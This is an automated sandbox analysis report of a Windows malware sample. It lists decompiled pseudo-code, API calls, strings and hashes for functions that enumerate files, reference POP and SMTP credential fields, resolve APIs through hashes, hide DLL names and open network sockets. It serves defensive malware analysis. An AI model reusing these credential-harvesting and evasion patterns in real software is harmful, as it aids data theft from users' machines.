Associated: 00000004.00000002.2374730922.000000000049F000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: f79b56dc6ad3da2cac26fc86ff368e80ed48b863effb0882933f587015448164
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: f79b56dc6ad3da2cac26fc86ff368e80ed48b863effb0882933f587015448164
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Uniqueness

Uniqueness Score: -1.00%

Function 00403D74, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 200
fileCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				struct _WIN32_FIND_DATAW _v596;
				void* __ebx;
				void* _t35;
				intOrPtr* _t42;
				intOrPtr* _t51;
				intOrPtr* _t55;
				intOrPtr _t60;
				void* _t66;
				void* _t73;
				void* _t74;
				WCHAR* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;

				L004067C4(0xa); // executed
				_t72 = 0;
				_t100 = 0x2e;
				_t106 = _a16;
				if(_a16 == 0) {
					L15:
					_push(_a8);
					_t98 = E00405B6F(0, L"%s\\%s", _a4);
					_t104 = _t103 + 0xc;
					if(_t98 == 0) {
						L30:
						__eflags = 0;
						return 0;
					}
					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
					_t35 = FindFirstFileW(_t98,  &_v596); // executed
					_t73 = _t35;
					if(_t73 == 0xffffffff) {
						L29:
						E00402BAB(_t98);
						goto L30;
					}
					L17:
					while(1) {
						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
							if(_v596.dwFileAttributes != 0x10) {
								L21:
								_push( &(_v596.cFileName));
								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
								_t104 = _t104 + 0xc;
								if(_t101 == 0) {
									goto L24;
								}
								if(_a12 == 0) {
									E00402BAB(_t98);
									E00403BEF(_t73);
									return _t101;
								}
								_a12(_t101);
								E00402BAB(_t101);
								goto L24;
							}
							_t124 = _a20;
							if(_a20 == 0) {
								goto L24;
							}
							goto L21;
						} else {
							L24:
							_t42 = E004031E5(_t73, 0, 0xce4477cc, 0, 0);
							_push( &_v596);
							_push(_t73);
							if( *_t42() == 0) {
								E00403BEF(_t73);
								goto L29;
							}
							_t100 = 0x2e;
							continue;
						}
					}
				}
				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
				if(_t102 == 0) {
					L14:
					_t100 = 0x2e;
					goto L15;
				}
				_t51 = E004031E5(0, 0, 0xd4f4acea, 0, 0);
				_t74 =  *_t51(_t102,  &_v596);
				if(_t74 == 0xffffffff) {
					L13:
					E00402BAB(_t102);
					_t72 = 0;
					goto L14;
				} else {
					goto L3;
				}
				do {
					L3:
					if((_v596.dwFileAttributes & 0x00000010) == 0) {
						goto L11;
					}
					if(_a24 == 0) {
						L7:
						if(E00405D24( &(_v596.cFileName)) >= 3) {
							L9:
							_push( &(_v596.cFileName));
							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
							_t103 = _t103 + 0xc;
							_a16 = _t60;
							_t115 = _t60;
							if(_t60 == 0) {
								goto L11;
							}
							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
							E00402BAB(_a16);
							_t103 = _t103 + 0x1c;
							if(_t99 != 0) {
								E00402BAB(_t102);
								E00403BEF(_t74);
								return _t99;
							}
							goto L11;
						}
						_t66 = 0x2e;
						_t114 = _v596.cFileName - _t66;
						if(_v596.cFileName == _t66) {
							goto L11;
						}
						goto L9;
					}
					_push(L"Windows");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					_push(L"Program Files");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					goto L7;
					L11:
					_t55 = E004031E5(_t74, 0, 0xce4477cc, 0, 0);
					_push( &_v596);
					_push(_t74);
				} while ( *_t55() != 0);
				E00403BEF(_t74);
				goto L13;
			}

0x00403d82
0x00403d88
0x00403d8c
0x00403d8d
0x00403d90
0x00403ea9
0x00403ea9
0x00403eb9
0x00403ebb
0x00403ec0
0x00403f95
0x00403f95
0x00000000
0x00403f95
0x00403ece
0x00403edb
0x00403edd
0x00403ee2
0x00403f8e
0x00403f8f
0x00000000
0x00403f94
0x00000000
0x00403ee8
0x00403ef8
0x00403f0a
0x00403f12
0x00403f18
0x00403f26
0x00403f28
0x00403f2d
0x00000000
0x00000000
0x00403f33
0x00403f76
0x00403f7c
0x00000000
0x00403f83
0x00403f36
0x00403f3a
0x00000000
0x00403f40
0x00403f0c
0x00403f10
0x00000000
0x00000000
0x00000000
0x00403f41
0x00403f41
0x00403f4b
0x00403f56
0x00403f57
0x00403f5c
0x00403f88
0x00000000
0x00403f8d
0x00403f60
0x00000000
0x00403f60
0x00403ef8
0x00403ee8
0x00403da3
0x00403da9
0x00403ea6
0x00403ea8
0x00000000
0x00403ea8
0x00403db7
0x00403dc6
0x00403dcb
0x00403e9d
0x00403e9e
0x00403ea4
0x00000000
0x00000000
0x00000000
0x00000000
0x00403dd1
0x00403dd1
0x00403dd8
0x00000000
0x00000000
0x00403de2
0x00403e12
0x00403e22
0x00403e30
0x00403e36
0x00403e3f
0x00403e44
0x00403e47
0x00403e4a
0x00403e4c
0x00000000
0x00000000
0x00403e63
0x00403e65
0x00403e6a
0x00403e6f
0x00403f64
0x00403f6a
0x00000000
0x00403f71
0x00000000
0x00403e6f
0x00403e26
0x00403e27
0x00403e2e
0x00000000
0x00000000
0x00000000
0x00403e2e
0x00403dea
0x00403df9
0x00000000
0x00000000
0x00403e01
0x00403e10
0x00000000
0x00000000
0x00000000
0x00403e75
0x00403e7f
0x00403e8a
0x00403e8b
0x00403e8e
0x00403e97
0x00000000

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB

Strings

Program Files, xrefs: 00403E01
%s\%s, xrefs: 00403E3A, 00403EAF, 00403F1C
Windows, xrefs: 00403DEA
%s\*, xrefs: 00403D99

Memory Dump Source

Source File: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2374726593.000000000049B000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.2374730922.000000000049F000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileFindFirst
String ID: %s\%s$%s\*$Program Files$Windows
API String ID: 1974802433-2009209621
Opcode ID: 37fc6874236845144b3e65c0dbd9dbea5aefa5a766414cf3057e60f9d4d43a0b
Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
Opcode Fuzzy Hash: 37fc6874236845144b3e65c0dbd9dbea5aefa5a766414cf3057e60f9d4d43a0b
Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C

Uniqueness

Uniqueness Score: -1.00%

Function 00402B7C, Relevance: 3.0, APIs: 2, Instructions: 20
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402B7C(long _a4) {
				void* _t4;
				void* _t7;

				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				_t7 = _t4;
				if(_t7 != 0) {
					E00402B4E(_t7, 0, _a4);
				}
				return _t7;
			}

0x00402b8c
0x00402b92
0x00402b96
0x00402b9e
0x00402ba3
0x00402baa

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2374726593.000000000049B000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.2374730922.000000000049F000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Uniqueness

Uniqueness Score: -1.00%

Function 00406069, Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406069(WCHAR* _a4, DWORD* _a8) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 9, 0xd4449184, 0, 0);
				_t4 = GetUserNameW(_a4, _a8); // executed
				return _t4;
			}

0x00406077
0x00406082
0x00406085

APIs

GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082

Memory Dump Source

Source File: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2374726593.000000000049B000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.2374730922.000000000049F000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559

Uniqueness

Uniqueness Score: -1.00%

Function 00404ED4, Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2374726593.000000000049B000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.2374730922.000000000049F000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Uniqueness

Uniqueness Score: -1.00%

Function 0022003C, Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0022024D

Strings

kernel32.dll, xrefs: 0022008F, 00220095
cess, xrefs: 0022018D

Memory Dump Source

Source File: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
Instruction ID: 65acc919516a519e085da2f084e51593b3e0a39d4d47a66df98e070ce9b82cc0
Opcode Fuzzy Hash: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
Instruction Fuzzy Hash: 68526B74A11229DFDB64CF98D984BA8BBB1BF09304F1480D9E50DAB352DB30AE95DF14

Uniqueness

Uniqueness Score: -1.00%

Function 004061C3, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 151
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E004061C3(void* __eax, void* __ebx, void* __eflags) {
				WCHAR* _v8;
				long _v12;
				void** _v16;
				WCHAR* _v20;
				long _v24;
				long _v28;
				union _SID_NAME_USE _v32;
				intOrPtr* _t25;
				WCHAR* _t27;
				WCHAR* _t30;
				WCHAR* _t31;
				WCHAR* _t36;
				WCHAR* _t37;
				WCHAR* _t40;
				WCHAR* _t41;
				long _t44;
				intOrPtr* _t45;
				WCHAR* _t46;
				void* _t48;
				WCHAR* _t49;
				WCHAR* _t67;
				void* _t68;
				void* _t74;

				_t48 = __ebx;
				_t67 = 0;
				_v8 = 0;
				E00402BF2();
				_t68 = __eax;
				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
				_t2 =  &_v8; // 0x414449
				_push(1);
				_push(8);
				_push(_t68);
				if( *_t25() != 0) {
					L4:
					_t27 = E00402B7C(0x208);
					_v20 = _t27;
					__eflags = _t27;
					if(_t27 != 0) {
						E0040338C(_t27, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_push(_t48);
					_t49 = E00402B7C(0x208);
					__eflags = _t49;
					if(_t49 != 0) {
						E0040338C(_t49, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_v28 = 0x208;
					_v24 = 0x208;
					_t7 =  &_v8; // 0x414449
					_v12 = _t67;
					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
					__eflags = _t30;
					if(_t30 == 0) {
						_t36 = E00402B7C(_v12);
						_v16 = _t36;
						__eflags = _t36;
						if(_t36 != 0) {
							_t14 =  &_v8; // 0x414449, executed
							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
							__eflags = _t37;
							if(_t37 != 0) {
								E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
								_t40 = LookupAccountSidW(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
								__eflags = _t40;
								if(__eflags != 0) {
									_t41 = E00405B6F(__eflags, L"%s", _t49); // executed
									_t67 = _t41;
								}
							}
							E00402BAB(_v16);
						}
					}
					__eflags = _v8;
					if(_v8 != 0) {
						E00403C40(_v8); // executed
					}
					__eflags = _t49;
					if(_t49 != 0) {
						E00402BAB(_t49);
					}
					_t31 = _v20;
					__eflags = _t31;
					if(_t31 != 0) {
						E00402BAB(_t31);
					}
					return _t67;
				}
				_t44 = GetLastError();
				if(_t44 == 0x3f0) {
					E004060AC();
					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
					_t3 =  &_v8; // 0x414449
					_t46 =  *_t45(_t44, 8, _t3);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L2;
					}
					goto L4;
				}
				L2:
				return 0;
			}

0x004061c3
0x004061cb
0x004061cd
0x004061d0
0x004061de
0x004061e0
0x004061e5
0x004061e9
0x004061eb
0x004061ed
0x004061f2
0x0040622a
0x00406230
0x00406235
0x00406239
0x0040623b
0x00406244
0x00406249
0x00406249
0x0040624c
0x00406253
0x00406256
0x00406258
0x00406261
0x00406266
0x00406266
0x00406270
0x00406273
0x00406276
0x0040627b
0x0040627e
0x0040628c
0x0040628e
0x00406290
0x00406295
0x0040629a
0x0040629e
0x004062a0
0x004062ac
0x004062af
0x004062b7
0x004062b9
0x004062c9
0x004062e0
0x004062e2
0x004062e4
0x004062ec
0x004062f3
0x004062f3
0x004062e4
0x004062f8
0x004062fd
0x004062a0
0x004062fe
0x00406302
0x00406307
0x0040630c
0x0040630d
0x0040630f
0x00406312
0x00406317
0x00406318
0x0040631c
0x0040631e
0x00406321
0x00406326
0x00000000
0x00406327
0x004061f4
0x004061ff
0x00406208
0x00406218
0x0040621d
0x00406224
0x00406226
0x00406228
0x00000000
0x00000000
0x00000000
0x00406228
0x00406201
0x00000000

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261
GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
LookupAccountSidW.ADVAPI32(00000000,?,?,?,00000000,?,?,00000009,C0862E2B,00000000,00000000), ref: 004062E0

Strings

IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B
IDA, xrefs: 00406304

Memory Dump Source

Source File: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2374726593.000000000049B000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.2374730922.000000000049F000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _wmemset$AccountErrorInformationLastLookupToken
String ID: IDA$IDA
API String ID: 3235442692-2020647798
Opcode ID: 41c24b6d3b4ebd9f4a63928f45be293b57877ef41a093954a51cea15ed17ee04
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: 41c24b6d3b4ebd9f4a63928f45be293b57877ef41a093954a51cea15ed17ee04
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Uniqueness

Uniqueness Score: -1.00%

Function 00404E17, Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00404E17(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void _v40;
				void* _t23;
				signed int _t24;
				signed int* _t25;
				signed int _t30;
				signed int _t31;
				signed int _t33;
				signed int _t41;
				void* _t42;
				signed int* _t43;

				_v8 = _v8 & 0x00000000;
				_t33 = 8;
				memset( &_v40, 0, _t33 << 2);
				_v32 = 1;
				_t23 =  &_v40;
				_v28 = 6;
				_v36 = 2;
				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
				if(_t23 == 0) {
					_t24 = E00402B7C(4);
					_t43 = _t24;
					_t31 = _t30 | 0xffffffff;
					 *_t43 = _t31;
					_t41 = _v8;
					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
					 *_t43 = _t24;
					if(_t24 != _t31) {
						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
						if(_t24 == _t31) {
							E00404DE5(_t24,  *_t43);
							 *_t43 = _t31;
						}
						__imp__freeaddrinfo(_v8);
						if( *_t43 != _t31) {
							_t25 = _t43;
							goto L10;
						} else {
							E00402BAB(_t43);
							L8:
							_t25 = 0;
							L10:
							return _t25;
						}
					}
					E00402BAB(_t43);
					__imp__freeaddrinfo(_v8);
					goto L8;
				}
				return 0;
			}

0x00404e1d
0x00404e26
0x00404e2a
0x00404e2f
0x00404e37
0x00404e3a
0x00404e45
0x00404e4f
0x00404e57
0x00404e61
0x00404e66
0x00404e68
0x00404e6c
0x00404e6e
0x00404e7a
0x00404e80
0x00404e84
0x00404e9f
0x00404ea7
0x00404eab
0x00404eb1
0x00404eb1
0x00404eb6
0x00404ebe
0x00404ecb
0x00000000
0x00404ec0
0x00404ec1
0x00404ec7
0x00404ec7
0x00404ecd
0x00000000
0x00404ece
0x00404ebe
0x00404e87
0x00404e90
0x00000000
0x00404e90
0x00000000

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2374726593.000000000049B000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.2374730922.000000000049F000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: 4b5d0236f78ee6e742c8765d729f006991faa6d0394e9cf29d407bb3dd2fcf93
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 4b5d0236f78ee6e742c8765d729f006991faa6d0394e9cf29d407bb3dd2fcf93
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Uniqueness

Uniqueness Score: -1.00%

Function 004040BB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v12;
				long _v16;
				void* __ebx;
				void* __edi;
				void* _t16;
				intOrPtr* _t25;
				long* _t28;
				void* _t30;
				int _t32;
				intOrPtr* _t33;
				void* _t35;
				void* _t42;
				intOrPtr _t43;
				long _t44;
				struct _OVERLAPPED* _t46;

				_t46 = 0;
				_t35 = 0;
				E004031E5(0, 0, 0xe9fabb88, 0, 0);
				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t42 = _t16;
				_v8 = _t42;
				if(_t42 == 0xffffffff) {
					__eflags = _a12;
					if(_a12 == 0) {
						L10:
						return _t35;
					}
					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
					__eflags = _t43;
					if(_t43 == 0) {
						goto L10;
					}
					_push(0);
					__eflags = E00403C59(_a4, _t43);
					if(__eflags != 0) {
						_v8 = 0;
						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
						_push(_t43);
						 *_a8 = _v8;
						E00403D44();
					}
					E00402BAB(_t43);
					return _t46;
				}
				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
				_t44 =  *_t25(_t42,  &_v12);
				if(_v12 != 0 || _t44 > 0x40000000) {
					L8:
					_t45 = _v8;
					goto L9;
				} else {
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 = _t44;
					}
					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
					_t35 = _t30;
					if(_t35 == 0) {
						goto L8;
					} else {
						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
						_t45 = _v8;
						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
						if(_t32 == 0) {
							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
							 *_t33(_t35, _t46, 0x8000);
							_t35 = _t46;
						}
						L9:
						E00403C40(_t45); // executed
						goto L10;
					}
				}
			}

0x004040c4
0x004040ce
0x004040d0
0x004040e8
0x004040ea
0x004040ec
0x004040f2
0x0040418d
0x00404190
0x00404184
0x00000000
0x00404184
0x004041a0
0x004041a5
0x004041a7
0x00000000
0x00000000
0x004041a9
0x004041b6
0x004041b8
0x004041be
0x004041cb
0x004041d0
0x004041d1
0x004041d3
0x004041d8
0x004041dc
0x00000000
0x004041e2
0x00404100
0x0040410c
0x00404111
0x0040417a
0x0040417a
0x00000000
0x0040411b
0x0040411b
0x00404120
0x00404122
0x00404122
0x0040412c
0x0040413a
0x0040413c
0x00404140
0x00000000
0x00404142
0x0040414a
0x00404155
0x0040415a
0x0040415e
0x00404168
0x00404174
0x00404176
0x00404176
0x0040417d
0x0040417e
0x00000000
0x00404183
0x00404140

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A

Strings

.tmp, xrefs: 00404196

Memory Dump Source

Source File: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2374726593.000000000049B000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.2374730922.000000000049F000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$AllocCreateReadVirtual
String ID: .tmp
API String ID: 3585551309-2986845003
Opcode ID: add4054a976e939e32d72649b47cfb09546c5f3c1c47cf34a3f1713be6392eae
Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
Opcode Fuzzy Hash: add4054a976e939e32d72649b47cfb09546c5f3c1c47cf34a3f1713be6392eae
Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9

Uniqueness

Uniqueness Score: -1.00%

Function 00413866, Relevance: 4.6, APIs: 3, Instructions: 147
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00413866(void* __eflags) {
				short _v6;
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				char _v48;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				char _v76;
				void* __ebx;
				void* __edi;
				void* _t38;
				short _t43;
				short _t44;
				short _t45;
				short _t46;
				short _t47;
				short _t48;
				short _t50;
				short _t51;
				short _t52;
				short _t54;
				short _t55;
				intOrPtr* _t57;
				intOrPtr* _t59;
				intOrPtr* _t61;
				void* _t63;
				WCHAR* _t65;
				long _t68;
				void* _t75;
				short _t76;
				short _t78;
				short _t83;
				short _t84;
				short _t85;

				E00402C6C(_t38);
				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
				SetErrorMode(3); // executed
				_t43 = 0x4f;
				_v76 = _t43;
				_t44 = 0x4c;
				_v74 = _t44;
				_t45 = 0x45;
				_v72 = _t45;
				_t46 = 0x41;
				_v70 = _t46;
				_t47 = 0x55;
				_v68 = _t47;
				_t48 = 0x54;
				_t76 = 0x33;
				_t84 = 0x32;
				_t83 = 0x2e;
				_t78 = 0x64;
				_t85 = 0x6c;
				_v66 = _t48;
				_v52 = 0;
				_t50 = 0x77;
				_v48 = _t50;
				_t51 = 0x73;
				_v46 = _t51;
				_t52 = 0x5f;
				_v42 = _t52;
				_v28 = 0;
				_t54 = 0x6f;
				_v24 = _t54;
				_t55 = 0x65;
				_v20 = _t55;
				_v64 = _t76;
				_v62 = _t84;
				_v60 = _t83;
				_v58 = _t78;
				_v56 = _t85;
				_v54 = _t85;
				_v44 = _t84;
				_v40 = _t76;
				_v38 = _t84;
				_v36 = _t83;
				_v34 = _t78;
				_v32 = _t85;
				_v30 = _t85;
				_v22 = _t85;
				_v18 = _t76;
				_v16 = _t84;
				_v14 = _t83;
				_v12 = _t78;
				_v10 = _t85;
				_v8 = _t85;
				_v6 = 0;
				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t57( &_v76);
				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t59( &_v48);
				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				_t81 =  &_v24;
				 *_t61( &_v24); // executed
				_t63 = E00414059(); // executed
				if(_t63 != 0) {
					_t65 = E00413D97(0);
					E004031E5(0, 0, 0xcf167df4, 0, 0);
					CreateMutexW(0, 1, _t65); // executed
					_t68 = GetLastError();
					_t92 = _t68 - 0xb7;
					if(_t68 == 0xb7) {
						E00413B81(0);
						_pop(_t81); // executed
					}
					E00413003(_t92); // executed
					E00412B2E(_t92);
					E00412D31(_t81, _t84);
					E00413B3F();
					E00413B81(0);
					 *0x49fdd0 = 1;
				}
				return 0;
			}

0x0041386f
0x0041387e
0x00413885
0x00413889
0x0041388c
0x00413890
0x00413893
0x00413897
0x0041389a
0x0041389e
0x004138a1
0x004138a5
0x004138a8
0x004138ac
0x004138af
0x004138b2
0x004138b5
0x004138b8
0x004138bb
0x004138bc
0x004138c4
0x004138c8
0x004138cb
0x004138cf
0x004138d2
0x004138d6
0x004138d7
0x004138df
0x004138e3
0x004138e4
0x004138ea
0x004138eb
0x004138f1
0x004138f5
0x004138f9
0x004138fd
0x00413901
0x00413905
0x00413909
0x0041390d
0x00413911
0x00413915
0x00413919
0x0041391d
0x00413921
0x00413925
0x00413929
0x0041392d
0x00413931
0x00413935
0x00413939
0x0041393d
0x00413941
0x00413950
0x00413959
0x0041395f
0x00413968
0x0041396e
0x00413973
0x00413977
0x00413979
0x00413980
0x00413982
0x00413991
0x0041399c
0x0041399e
0x004139a4
0x004139a9
0x004139ac
0x004139b1
0x004139b1
0x004139b2
0x004139b7
0x004139bc
0x004139c1
0x004139c7
0x004139cd
0x004139cd
0x004139db

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
